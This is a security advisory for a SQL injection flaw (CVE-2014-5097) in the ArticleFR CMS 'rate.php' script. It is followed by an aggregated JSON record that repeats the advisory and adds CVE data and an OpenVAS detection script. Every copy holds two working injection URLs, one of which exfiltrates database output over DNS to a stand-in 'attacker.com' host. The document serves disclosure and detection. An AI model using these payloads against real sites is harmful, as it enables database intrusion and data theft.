Advisory ID: HTB23225
Product: ArticleFR
Vendor: Free Reprintables
Vulnerable Version(s): 3.0.4 and probably prior
Tested Version: 3.0.4
Advisory Publication: July 23, 2014 [without technical details]
Vendor Notification: July 23, 2014
Public Disclosure: August 20, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-5097
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website.
1) SQL Injection in ArticleFR: CVE-2014-5097
The vulnerability exists due to insufficient sanitization of the "id" HTTP GET parameter passed to "/rate.php" script, when "act" HTTP GET parameter is set to either "get" or "set". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in application’s database.
The following exploitation example demonstrates vulnerability when "act" HTTP GET parameter is set to value "get". The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
http://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
Below is another exploitation example, which displays version of MySQL server when "act" HTTP GET parameter is set to value "set":
http://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%20--%202
-----------------------------------------------------------------------------------------------
Solution:
Disclosure timeline:
2014-07-23 Vendor Alerted via emails.
2014-07-31 Vendor Alerted via emails.
2014-07-31 Issue created on GitHub.
2014-08-04 Vendor closed issue on GitHub.
2014-08-04 Vendor locked and limited conversation to collaborators on GitHub.
2014-08-07 Fix Requested via emails.
2014-08-11 Fix Requested via emails.
2014-08-18 Fix Requested via emails.
2014-08-20 Public disclosure with self-written patch.
Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23225-patch.zip
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23225 - https://www.htbridge.com/advisory/HTB23225 - SQL Injection Vulnerability in ArticleFR in ArticleFR.
[2] ArticleFR - http://freereprintables.com/ - Free Article Directory CMS System .
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
{"id": "SECURITYVULNS:DOC:31031", "bulletinFamily": "software", "title": "SQL Injection Vulnerability in ArticleFR", "description": "\r\n\r\nAdvisory ID: HTB23225\r\nProduct: ArticleFR\r\nVendor: Free Reprintables\r\nVulnerable Version(s): 3.0.4 and probably prior\r\nTested Version: 3.0.4\r\nAdvisory Publication: July 23, 2014 [without technical details]\r\nVendor Notification: July 23, 2014 \r\nPublic Disclosure: August 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-5097\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website.\r\n\r\n\r\n1) SQL Injection in ArticleFR: CVE-2014-5097\r\n\r\nThe vulnerability exists due to insufficient sanitization of the "id" HTTP GET parameter passed to "/rate.php" script, when "act" HTTP GET parameter is set to either "get" or "set". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in application\u2019s database. \r\n\r\nThe following exploitation example demonstrates vulnerability when "act" HTTP GET parameter is set to value "get". The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202\r\n\r\nBelow is another exploitation example, which displays version of MySQL server when "act" HTTP GET parameter is set to value "set":\r\n\r\nhttp://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%20--%202\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2014-07-23 Vendor Alerted via emails.\r\n2014-07-31 Vendor Alerted via emails.\r\n2014-07-31 Issue created on GitHub.\r\n2014-08-04 Vendor closed issue on GitHub.\r\n2014-08-04 Vendor locked and limited conversation to collaborators on GitHub.\r\n2014-08-07 Fix Requested via emails.\r\n2014-08-11 Fix Requested via emails.\r\n2014-08-18 Fix Requested via emails.\r\n2014-08-20 Public disclosure with self-written patch.\r\n\r\nCurrently we are not aware of any official solution for this vulnerability.\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23225-patch.zip\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23225 - https://www.htbridge.com/advisory/HTB23225 - SQL Injection Vulnerability in ArticleFR in ArticleFR.\r\n[2] ArticleFR - http://freereprintables.com/ - Free Article Directory CMS System .\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "published": "2014-08-26T00:00:00", "modified": "2014-08-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31031", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-5097"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:53", "edition": 1, "viewCount": 28, "enchantments": {"score": {"value": 6.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-5097"]}, {"type": "htbridge", "idList": ["HTB23225"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804819"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127943"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13930"]}, {"type": "zdt", "idList": ["1337DAY-ID-22537"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-5097"]}, {"type": "htbridge", "idList": ["HTB23225"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127943"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13930"]}, {"type": "zdt", "idList": ["1337DAY-ID-22537"]}]}, "exploitation": null, "vulnersScore": 6.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"cve": [{"lastseen": "2022-03-23T13:34:33", "description": "Multiple SQL injection vulnerabilities in Free Reprintables ArticleFR 3.0.4 and earlier allow remote attackers to execute arbitrary SQL commands via the id parameter in a (1) get or (2) set action to rate.php.", "cvss3": {}, "published": "2014-08-22T14:55:00", "type": "cve", "title": "CVE-2014-5097", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5097"], "modified": "2018-10-09T19:49:00", "cpe": ["cpe:/a:freereprintables:articlefr:3.0.4"], "id": "CVE-2014-5097", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5097", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:freereprintables:articlefr:3.0.4:*:*:*:*:*:*:*"]}], "htbridge": [{"lastseen": "2020-12-24T11:12:50", "description": "High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website. \n \n \n1) SQL Injection in ArticleFR: CVE-2014-5097 \n \nThe vulnerability exists due to insufficient sanitization of the \"id\" HTTP GET parameter passed to \"/rate.php\" script, when \"act\" HTTP GET parameter is set to either \"get\" or \"set\". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in application\u2019s database. \n \nThe following exploitation example demonstrates vulnerability when \"act\" HTTP GET parameter is set to value \"get\". The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202 \n \nBelow is another exploitation example, which displays version of MySQL server when \"act\" HTTP GET parameter is set to value \"set\": \n \nhttp://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%2 0--%202\n", "edition": 2, "cvss3": {}, "published": "2014-07-23T00:00:00", "type": "htbridge", "title": "SQL Injection Vulnerability in ArticleFR", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5097"], "modified": "2014-08-20T00:00:00", "id": "HTB23225", "href": "https://www.htbridge.com/advisory/HTB23225", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}], "zdt": [{"lastseen": "2018-04-05T23:48:30", "description": "ArticleFR version 3.0.4 suffers from a remote SQL injection vulnerability.", "cvss3": {}, "published": "2014-08-20T00:00:00", "type": "zdt", "title": "ArticleFR 3.0.4 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5097"], "modified": "2014-08-20T00:00:00", "id": "1337DAY-ID-22537", "href": "https://0day.today/exploit/description/22537", "sourceData": "Product: ArticleFR\r\nVendor: Free Reprintables\r\nVulnerable Version(s): 3.0.4 and probably prior\r\nTested Version: 3.0.4\r\nAdvisory Publication: July 23, 2014 [without technical details]\r\nVendor Notification: July 23, 2014 \r\nPublic Disclosure: August 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-5097\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website.\r\n\r\n\r\n1) SQL Injection in ArticleFR: CVE-2014-5097\r\n\r\nThe vulnerability exists due to insufficient sanitization of the \"id\" HTTP GET parameter passed to \"/rate.php\" script, when \"act\" HTTP GET parameter is set to either \"get\" or \"set\". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in application\u2019s database. \r\n\r\nThe following exploitation example demonstrates vulnerability when \"act\" HTTP GET parameter is set to value \"get\". The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202\r\n\r\nBelow is another exploitation example, which displays version of MySQL server when \"act\" HTTP GET parameter is set to value \"set\":\r\n\r\nhttp://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%20--%202\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2014-07-23 Vendor Alerted via emails.\r\n2014-07-31 Vendor Alerted via emails.\r\n2014-07-31 Issue created on GitHub.\r\n2014-08-04 Vendor closed issue on GitHub.\r\n2014-08-04 Vendor locked and limited conversation to collaborators on GitHub.\r\n2014-08-07 Fix Requested via emails.\r\n2014-08-11 Fix Requested via emails.\r\n2014-08-18 Fix Requested via emails.\r\n2014-08-20 Public disclosure with self-written patch.\r\n\r\nCurrently we are not aware of any official solution for this vulnerability.\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23225-patch.zip\n\n# 0day.today [2018-04-05] #", "sourceHref": "https://0day.today/exploit/22537", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-08T19:05:27", "description": "This host is installed with ArticleFR CMS and is prone to sql injection\n vulnerability.", "cvss3": {}, "published": "2014-08-25T00:00:00", "type": "openvas", "title": "ArticleFR CMS 'id' Parameter SQL Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5097"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310804819", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804819", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ArticleFR CMS 'id' Parameter SQL Injection Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804819\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_cve_id(\"CVE-2014-5097\");\n script_bugtraq_id(69307);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-08-25 18:58:36 +0530 (Mon, 25 Aug 2014)\");\n script_name(\"ArticleFR CMS 'id' Parameter SQL Injection Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ArticleFR CMS and is prone to sql injection\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and check whether it is able to execute\n sql query or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to the '/rate.php' script not properly sanitizing user-supplied\n input to the 'id' parameter.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to manipulate SQL queries in the\n backend database allowing for the manipulation or disclosure of arbitrary data.\");\n\n script_tag(name:\"affected\", value:\"ArticleFR CMS version 3.0.4 and earlier.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\nLikely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23225\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/127943\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/533183/100/0/threaded\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nhttp_port = http_get_port(default:80);\n\nif(!http_can_host_php(port:http_port)){\n exit(0);\n}\n\nforeach dir (make_list_unique(\"/\", \"/articleFR\", \"/cms\", http_cgi_dirs(port:http_port)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n rcvRes = http_get_cache(item:string(dir, \"/index.php\"), port:http_port);\n\n if (rcvRes && rcvRes =~ \"Powered by.*>ArticleFR\")\n {\n url = dir + \"/rate.php?act=set&id=0%20union%20select%201,version%28%2\" +\n \"9,3,4%20--%202\";\n\n if(http_vuln_check(port:http_port, url:url, pattern:\"scored.*from.([0-9.]+)\"))\n {\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:17", "description": "", "cvss3": {}, "published": "2014-08-20T00:00:00", "type": "packetstorm", "title": "ArticleFR 3.0.4 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5097"], "modified": "2014-08-20T00:00:00", "id": "PACKETSTORM:127943", "href": "https://packetstormsecurity.com/files/127943/ArticleFR-3.0.4-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23225 \nProduct: ArticleFR \nVendor: Free Reprintables \nVulnerable Version(s): 3.0.4 and probably prior \nTested Version: 3.0.4 \nAdvisory Publication: July 23, 2014 [without technical details] \nVendor Notification: July 23, 2014 \nPublic Disclosure: August 20, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-5097 \nRisk Level: High \nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website. \n \n \n1) SQL Injection in ArticleFR: CVE-2014-5097 \n \nThe vulnerability exists due to insufficient sanitization of the \"id\" HTTP GET parameter passed to \"/rate.php\" script, when \"act\" HTTP GET parameter is set to either \"get\" or \"set\". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in application\u2019s database. \n \nThe following exploitation example demonstrates vulnerability when \"act\" HTTP GET parameter is set to value \"get\". The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202 \n \nBelow is another exploitation example, which displays version of MySQL server when \"act\" HTTP GET parameter is set to value \"set\": \n \nhttp://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%20--%202 \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nDisclosure timeline: \n2014-07-23 Vendor Alerted via emails. \n2014-07-31 Vendor Alerted via emails. \n2014-07-31 Issue created on GitHub. \n2014-08-04 Vendor closed issue on GitHub. \n2014-08-04 Vendor locked and limited conversation to collaborators on GitHub. \n2014-08-07 Fix Requested via emails. \n2014-08-11 Fix Requested via emails. \n2014-08-18 Fix Requested via emails. \n2014-08-20 Public disclosure with self-written patch. \n \nCurrently we are not aware of any official solution for this vulnerability. \nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23225-patch.zip \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23225 - https://www.htbridge.com/advisory/HTB23225 - SQL Injection Vulnerability in ArticleFR in ArticleFR. \n[2] ArticleFR - http://freereprintables.com/ - Free Article Directory CMS System . \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/127943/articlefr-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2021-06-08T18:50:18", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-08-26T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-5025", "CVE-2014-5122", "CVE-2014-4722", "CVE-2014-2708", "CVE-2014-2327", "CVE-2014-0479", "CVE-2014-5243", "CVE-2014-0482", "CVE-2014-5241", "CVE-2014-5098", "CVE-2014-5339", "CVE-2014-0481", "CVE-2014-5097", "CVE-2014-3978", "CVE-2014-5262", "CVE-2014-5035", "CVE-2014-2709", "CVE-2014-5340", "CVE-2014-5026", "CVE-2014-5027", "CVE-2014-5261", "CVE-2014-5335", "CVE-2014-4002", "CVE-2014-2326", "CVE-2014-0480", "CVE-2014-5338", "CVE-2014-0483", "CVE-2014-3830", "CVE-2014-2328"], "modified": "2014-08-26T00:00:00", "id": "SECURITYVULNS:VULN:13930", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13930", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}